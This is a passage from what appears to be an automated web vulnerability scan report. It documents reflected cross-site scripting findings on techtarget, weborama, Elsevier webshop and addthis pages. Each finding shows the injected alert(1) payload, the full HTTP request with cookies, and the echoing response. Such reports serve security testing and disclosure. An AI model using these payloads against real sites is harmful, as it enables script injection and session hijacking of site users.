Host:   http://go.techtarget.com
Path:   //clicktrack-r/activity/a

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload debe2<img%20src%3da%20onerror%3dalert(1)>3afc08da00f was submitted in the REST URL parameter 3. This input was echoed as debe2<img src=a onerror=alert(1)>3afc08da00f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET //clicktrack-r/activity/adebe2<img%20src%3da%20onerror%3dalert(1)>3afc08da00f HTTP/1.1
Host: go.techtarget.com
Proxy-Connection: keep-alive
Referer: http://go.techtarget.com//clicktrack-r/activity/activity.gif6461a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eceb055b54ca
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304389783.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tt_ui=%7B%22fontSize%22%3A0%2C%22lastSite%22%3A%22searchcio-midmarket.techtarget.com%22%7D; ugcCltHeight=; bk=440e4ed4-5c74-423d-ae57-3ca0a3d609c7; bn_u=6923530019505823043; tt_prereg=t1@2240031635%24_2011-05-02%2021%3A29%3A36%26g%3D212087%2Ct1@2240031635%24_2011-05-02%2021%3A31%3A20%26g%3D212695; __utmv=; __utma=1.51700285.1304389783.1304389783.1304389783.1; __utmc=1

Response

HTTP/1.1 404 There is no Action mapped for namespace /activity and action name adebe2<img src=a onerror=alert(1)>3afc08da00f.
Server: Resin/3.1.8
Content-Type: text/html; charset=utf-8
Date: Mon, 02 May 2011 22:46:28 GMT
Content-Length: 452

<html>
<head><title>404 There is no Action mapped for namespace /activity and action name adebe2<img src=a onerror=alert(1)>3afc08da00f.</title></head>
<body>
<h1>404 There is no Action mapped for namespace /activity and action name adebe2<img src=a onerror=alert(1)>3afc08da00f.</h1>
...[SNIP]...

4.12. http://go.techtarget.com//clicktrack-r/activity/activity.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://go.techtarget.com
Path:   //clicktrack-r/activity/activity.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6461a<img%20src%3da%20onerror%3dalert(1)>ceb055b54ca was submitted in the REST URL parameter 3. This input was echoed as 6461a<img src=a onerror=alert(1)>ceb055b54ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET //clicktrack-r/activity/activity.gif6461a<img%20src%3da%20onerror%3dalert(1)>ceb055b54ca HTTP/1.1
Host: go.techtarget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; ugcCltHeight=; tt_prereg=t1@2240031635%24_2011-05-02%2021%3A29%3A36%26g%3D212087; bk=440e4ed4-5c74-423d-ae57-3ca0a3d609c7; bn_u=UNASSIGNED; __utmz=1.1304389783.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tt_ui=%7B%22fontSize%22%3A0%2C%22lastSite%22%3A%22searchcio-midmarket.techtarget.com%22%7D; __utma=1.51700285.1304389783.1304389783.1304389783.1; __utmc=1; __utmb=1.2.10.1304389783;

Response

HTTP/1.1 404 There is no Action mapped for namespace /activity and action name activity.gif6461a<img src=a onerror=alert(1)>ceb055b54ca.
Server: Resin/3.1.8
Content-Type: text/html; charset=utf-8
Connection: close
Date: Mon, 02 May 2011 22:25:49 GMT
Content-Length: 1327

<html>
<head><title>404 There is no Action mapped for namespace /activity and action name activity.gif6461a<img src=a onerror=alert(1)>ceb055b54ca.</title></head>
<body>
<h1>404 There is no Action mapped for namespace /activity and action name activity.gif6461a<img src=a onerror=alert(1)>ceb055b54ca.</h1>
...[SNIP]...

4.13. http://go.techtarget.com/activity/activity.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://go.techtarget.com
Path:   /activity/activity.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload afbcf<img%20src%3da%20onerror%3dalert(1)>3250be4ac70 was submitted in the REST URL parameter 2. This input was echoed as afbcf<img src=a onerror=alert(1)>3250be4ac70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /activity/activity.gifafbcf<img%20src%3da%20onerror%3dalert(1)>3250be4ac70 HTTP/1.1
Host: go.techtarget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; ugcCltHeight=; tt_prereg=t1@2240031635%24_2011-05-02%2021%3A29%3A36%26g%3D212087; bk=440e4ed4-5c74-423d-ae57-3ca0a3d609c7; bn_u=UNASSIGNED; __utmz=1.1304389783.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tt_ui=%7B%22fontSize%22%3A0%2C%22lastSite%22%3A%22searchcio-midmarket.techtarget.com%22%7D; __utma=1.51700285.1304389783.1304389783.1304389783.1; __utmc=1; __utmb=1.2.10.1304389783;

Response (redirected)

HTTP/1.1 404 There is no Action mapped for namespace /activity and action name activity.gifafbcf<img src=a onerror=alert(1)>3250be4ac70.
Server: Resin/3.1.8
Content-Type: text/html; charset=utf-8
Connection: close
Date: Mon, 02 May 2011 22:26:01 GMT
Content-Length: 1322

<html>
<head><title>404 There is no Action mapped for namespace /activity and action name activity.gifafbcf<img src=a onerror=alert(1)>3250be4ac70.</title></head>
<body>
<h1>404 There is no Action mapped for namespace /activity and action name activity.gifafbcf<img src=a onerror=alert(1)>3250be4ac70.</h1>
...[SNIP]...

4.14. http://go.techtarget.com/clicktrack-r/activity/a [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://go.techtarget.com
Path:   /clicktrack-r/activity/a

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 52d48<img%20src%3da%20onerror%3dalert(1)>9a5a459849d was submitted in the REST URL parameter 3. This input was echoed as 52d48<img src=a onerror=alert(1)>9a5a459849d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /clicktrack-r/activity/a52d48<img%20src%3da%20onerror%3dalert(1)>9a5a459849d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: go.techtarget.com

Response

HTTP/1.1 404 There is no Action mapped for namespace /activity and action name a52d48<img src=a onerror=alert(1)>9a5a459849d.
Server: Resin/3.1.8
Content-Type: text/html; charset=utf-8
Date: Mon, 02 May 2011 22:46:32 GMT
Content-Length: 1293

<html>
<head><title>404 There is no Action mapped for namespace /activity and action name a52d48<img src=a onerror=alert(1)>9a5a459849d.</title></head>
<body>
<h1>404 There is no Action mapped for namespace /activity and action name a52d48<img src=a onerror=alert(1)>9a5a459849d.</h1>
...[SNIP]...

4.15. http://go.techtarget.com/clicktrack-r/activity/activity.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://go.techtarget.com
Path:   /clicktrack-r/activity/activity.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 11f14<img%20src%3da%20onerror%3dalert(1)>973664cfb2d was submitted in the REST URL parameter 3. This input was echoed as 11f14<img src=a onerror=alert(1)>973664cfb2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /clicktrack-r/activity/activity.gif11f14<img%20src%3da%20onerror%3dalert(1)>973664cfb2d HTTP/1.1
Host: go.techtarget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; ugcCltHeight=; tt_prereg=t1@2240031635%24_2011-05-02%2021%3A29%3A36%26g%3D212087; bk=440e4ed4-5c74-423d-ae57-3ca0a3d609c7; bn_u=UNASSIGNED; __utmz=1.1304389783.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tt_ui=%7B%22fontSize%22%3A0%2C%22lastSite%22%3A%22searchcio-midmarket.techtarget.com%22%7D; __utma=1.51700285.1304389783.1304389783.1304389783.1; __utmc=1; __utmb=1.2.10.1304389783;

Response

HTTP/1.1 404 There is no Action mapped for namespace /activity and action name activity.gif11f14<img src=a onerror=alert(1)>973664cfb2d.
Server: Resin/3.1.8
Content-Type: text/html; charset=utf-8
Connection: close
Date: Mon, 02 May 2011 22:25:50 GMT
Content-Length: 1326

<html>
<head><title>404 There is no Action mapped for namespace /activity and action name activity.gif11f14<img src=a onerror=alert(1)>973664cfb2d.</title></head>
<body>
<h1>404 There is no Action mapped for namespace /activity and action name activity.gif11f14<img src=a onerror=alert(1)>973664cfb2d.</h1>
...[SNIP]...

4.16. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi [clicktag parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ieo.solution.weborama.fr
Path:   /fcgi-bin/adserv.fcgi

Issue detail

The value of the clicktag request parameter is copied into the HTML document as plain text between tags. The payload 73271<script>alert(1)</script>85f49d12bf0 was submitted in the clicktag parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&BOUNCE=OK&brnd=27843&clicktag=[URLTRACKING]73271<script>alert(1)</script>85f49d12bf0&rnd=[RANDOM] HTTP/1.1
Host: ieo.solution.weborama.fr
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AFFICHE_W=aSnSXc2yol9n80

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:05:20 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM"
Set-Cookie: _adpc=VG4DuWab; domain=.ieo.solution.weborama.fr; path=/; expires=Sat, 02-Jul-2011 04:04:35 GMT
Set-Cookie: _adpp=VG4DuZgraa; domain=.ieo.solution.weborama.fr; path=/; expires=Sat, 02-Jul-2011 04:04:35 GMT
Set-Cookie: _adpe=VG60Kqa; domain=.ieo.solution.weborama.fr; path=/; expires=Sat, 02-Jul-2011 04:04:35 GMT
Set-Cookie: _advcrea=6@|bm|a:b; domain=.ieo.solution.weborama.fr; path=/; expires=Thu, 11-Aug-2011 04:04:35 GMT
Pragma: no-cache
Cache-Control: no-cache
Connection: close
Content-Type: application/x-javascript
Content-Length: 3514

window['wbo_params'] = {
id: 76,
tag: '496052',
site: '449484',
w: 298,
h: 250,
root_x: '-1',
root_y: '-1',
zindex: '4242',
clic: '[URLTRACKING]73271<script>alert(1)</script>85f49d12bf0http://ieo.solution.weborama.fr/fcgi-bin/performance.fcgi?ID=449484&A=1&L=496052&C=21277&P=37169&CREA=76&T=E&URL=http%3A%2F%2Fwww.ieo.it%2FItaliano%2FPages%2FDefault.aspx',
target: '_blank',

...[SNIP]...

4.17. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi [clicktag parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ieo.solution.weborama.fr
Path:   /fcgi-bin/adserv.fcgi

Issue detail

The value of the clicktag request parameter is copied into the HTML document as plain text between tags. The payload 1f911<script>alert(1)</script>751eacaf9bd was submitted in the clicktag parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag=[URLTRACKING]1f911<script>alert(1)</script>751eacaf9bd&rnd=[RANDOM] HTTP/1.1
Host: ieo.solution.weborama.fr
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:05:27 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM"
Pragma: no-cache
Cache-Control: no-cache
Connection: close
Content-Type: application/x-javascript
Content-Length: 3514

window['wbo_params'] = {
id: 46,
tag: '496052',
site: '449484',
w: 298,
h: 250,
root_x: '-1',
root_y: '-1',
zindex: '4242',
clic: '[URLTRACKING]1f911<script>alert(1)</script>751eacaf9bdhttp://ieo.solution.weborama.fr/fcgi-bin/performance.fcgi?ID=449484&A=1&L=496052&C=21277&P=37169&CREA=46&T=E&URL=http%3A%2F%2Fwww.ieo.it%2FItaliano%2FPages%2FDefault.aspx',
target: '_blank',

...[SNIP]...

4.18. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ieo.solution.weborama.fr
Path:   /fcgi-bin/adserv.fcgi

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d4392<script>alert(1)</script>33066bb2dad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&BOUNCE=OK&brnd=27843&clicktag=[URLTRACKING]&rnd=[RANDOM]&d4392<script>alert(1)</script>33066bb2dad=1 HTTP/1.1
Host: ieo.solution.weborama.fr
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AFFICHE_W=aSnSXc2yol9n80

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:05:27 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM"
Set-Cookie: _adpc=VG4DuWab; domain=.ieo.solution.weborama.fr; path=/; expires=Sat, 02-Jul-2011 04:03:35 GMT
Set-Cookie: _adpp=VG4DuZgraa; domain=.ieo.solution.weborama.fr; path=/; expires=Sat, 02-Jul-2011 04:03:35 GMT
Set-Cookie: _adpe=VG60Kqa; domain=.ieo.solution.weborama.fr; path=/; expires=Sat, 02-Jul-2011 04:03:35 GMT
Set-Cookie: _advcrea=6@|b0|a:b; domain=.ieo.solution.weborama.fr; path=/; expires=Thu, 11-Aug-2011 04:03:35 GMT
Pragma: no-cache
Cache-Control: no-cache
Connection: close
Content-Type: application/x-javascript
Content-Length: 3686

window['wbo_params'] = {
id: 116,
tag: '496052',
site: '449484',
w: 298,
h: 250,
root_x: '-1',
root_y: '-1',
zindex: '4242',
clic: '[URLTRACKING]&rnd=[RANDOM]&d4392<script>alert(1)</script>33066bb2dad=1http://ieo.solution.weborama.fr/fcgi-bin/performance.fcgi?ID=449484&A=1&L=496052&C=21277&P=37169&CREA=116&T=E&URL=http%3A%2F%2Fwww.ieo.it%2FItaliano%2FPages%2FDefault.aspx',
target: '_blank'
...[SNIP]...

4.19. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ieo.solution.weborama.fr
Path:   /fcgi-bin/adserv.fcgi

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2a192<script>alert(1)</script>ef25b6f5bf6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag=[URLTRACKING]&rnd=[RANDOM]&2a192<script>alert(1)</script>ef25b6f5bf6=1 HTTP/1.1
Host: ieo.solution.weborama.fr
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:05:39 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM"
Pragma: no-cache
Cache-Control: no-cache
Connection: close
Content-Type: application/x-javascript
Content-Length: 3669

window['wbo_params'] = {
id: 96,
tag: '496052',
site: '449484',
w: 298,
h: 250,
root_x: '-1',
root_y: '-1',
zindex: '4242',
clic: '[URLTRACKING]&rnd=[RANDOM]&2a192<script>alert(1)</script>ef25b6f5bf6=1http://ieo.solution.weborama.fr/fcgi-bin/performance.fcgi?ID=449484&A=1&L=496052&C=21277&P=37169&CREA=96&T=E&URL=http%3A%2F%2Fwww.ieo.it%2FItaliano%2FPages%2FDefault.aspx',
target: '_blank',
...[SNIP]...

4.20. http://webshop.elsevier.com/forgotpassword.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://webshop.elsevier.com
Path:   /forgotpassword.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd172"><script>alert(1)</script>0b5c9abc8b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forgotpassword.html?bd172"><script>alert(1)</script>0b5c9abc8b8=1 HTTP/1.1
Host: webshop.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=76495853; ELSEVIER_ESTREET=%7Bts%20%272011%2D05%2D03%2000%3A00%3A00%27%7D; __utmz=84352454.1304389900.1.1.utmcsr=elsevier.com|utmccn=(referral)|utmcmd=referral|utmcct=/wps/find/journaldescription.cws_home/939/description; CFID=1230652; __utma=84352454.1435850867.1304389900.1304389900.1304389900.1; __utmc=84352454; __utmb=84352454.1.10.1304389900;

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Server: Microsoft-IIS/7.0
Date: Mon, 02 May 2011 22:33:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- Developed by Ritense webtechnology -->
<!-- http://www.ritense.com
...[SNIP]...
<form name="forgotPasswordForm" id="forgotPasswordForm" action="/redirect.cfm?404;http://webshop.elsevier.com:80/forgotpassword.html?bd172"><script>alert(1)</script>0b5c9abc8b8=1" method="post" class="logincontainer" onsubmit="return _CF_checkforgotPasswordForm(this)">
...[SNIP]...

4.21. https://webshop.elsevier.com/login.cfm [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00003C)%3C/script%3E parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://webshop.elsevier.com
Path:   /login.cfm

Issue detail

The value of the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00003C)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 252f0"><script>alert(1)</script>79e7f504dc5 was submitted in the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00003C)%3C/script%3E parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login.cfm?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00003C)%3C/script%3E252f0"><script>alert(1)</script>79e7f504dc5 HTTP/1.1
Host: webshop.elsevier.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=1230652; CFTOKEN=76495853; __utmz=84352454.1304389900.1.1.utmcsr=elsevier.com|utmccn=(referral)|utmcmd=referral|utmcct=/wps/find/journaldescription.cws_home/939/description; __utma=84352454.1435850867.1304389900.1304389900.1304389900.1; __utmc=84352454; ELSEVIER_ESTREET=%7Bts%20%272011%2D05%2D03%2000%3A00%3A00%27%7D

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Server: Microsoft-IIS/7.0
Date: Mon, 02 May 2011 22:51:44 GMT
Content-Length: 13461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- Developed by Ritense webtechnology -->
<!-- http://www.ritense.com
...[SNIP]...
<form name="loginForm" id="loginForm" action="/login.cfm?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00003C)%3C/script%3E252f0"><script>alert(1)</script>79e7f504dc5" method="post" target="actionFrame" class="logincontainer" onsubmit="return _CF_checkloginForm(this)">
...[SNIP]...

4.22. https://webshop.elsevier.com/login.cfm [d46 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://webshop.elsevier.com
Path:   /login.cfm

Issue detail

The value of the d46 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88da4"><script>alert(1)</script>91d57d817b5 was submitted in the d46 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login.cfm?d4688da4"><script>alert(1)</script>91d57d817b5 HTTP/1.1
Host: webshop.elsevier.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=1230652; CFTOKEN=76495853; __utmz=84352454.1304389900.1.1.utmcsr=elsevier.com|utmccn=(referral)|utmcmd=referral|utmcct=/wps/find/journaldescription.cws_home/939/description; __utma=84352454.1435850867.1304389900.1304389900.1304389900.1; __utmc=84352454; ELSEVIER_ESTREET=%7Bts%20%272011%2D05%2D03%2000%3A00%3A00%27%7D

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Server: Microsoft-IIS/7.0
Date: Mon, 02 May 2011 22:51:23 GMT
Content-Length: 13277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- Developed by Ritense webtechnology -->
<!-- http://www.ritense.com
...[SNIP]...
<form name="loginForm" id="loginForm" action="/login.cfm?d4688da4"><script>alert(1)</script>91d57d817b5" method="post" target="actionFrame" class="logincontainer" onsubmit="return _CF_checkloginForm(this)">
...[SNIP]...

4.23. https://webshop.elsevier.com/login.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://webshop.elsevier.com
Path:   /login.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d46e2"><script>alert(1)</script>03772b18c61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login.cfm?d46e2"><script>alert(1)</script>03772b18c61=1 HTTP/1.1
Host: webshop.elsevier.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=1230652; CFTOKEN=76495853; ELSEVIER_ESTREET=%7Bts%20%272011%2D05%2D02%2000%3A00%3A00%27%7D; __utmz=84352454.1304389900.1.1.utmcsr=elsevier.com|utmccn=(referral)|utmcmd=referral|utmcct=/wps/find/journaldescription.cws_home/939/description; __utma=84352454.1435850867.1304389900.1304389900.1304389900.1; __utmc=84352454; __utmb=84352454.1.10.1304389900

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Server: Microsoft-IIS/7.0
Date: Mon, 02 May 2011 22:27:41 GMT
Content-Length: 13277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- Developed by Ritense webtechnology -->
<!-- http://www.ritense.com
...[SNIP]...
<form name="loginForm" id="loginForm" action="/login.cfm?d46e2"><script>alert(1)</script>03772b18c61=1" method="post" target="actionFrame" class="logincontainer" onsubmit="return _CF_checkloginForm(this)">
...[SNIP]...

4.24. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31df3"-alert(1)-"249e5036cfd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php31df3"-alert(1)-"249e5036cfd HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 02 May 2011 22:27:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=m9ica98kbm5dt73tgro89dvv23; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1352
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php31df3"-alert(1)-"249e5036cfd";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);
gaPageTrac
...[SNIP]...

4.25. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c22ac<script>alert(1)</script>da40de6267f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.phpc22ac<script>alert(1)</script>da40de6267f HTTP/1.1
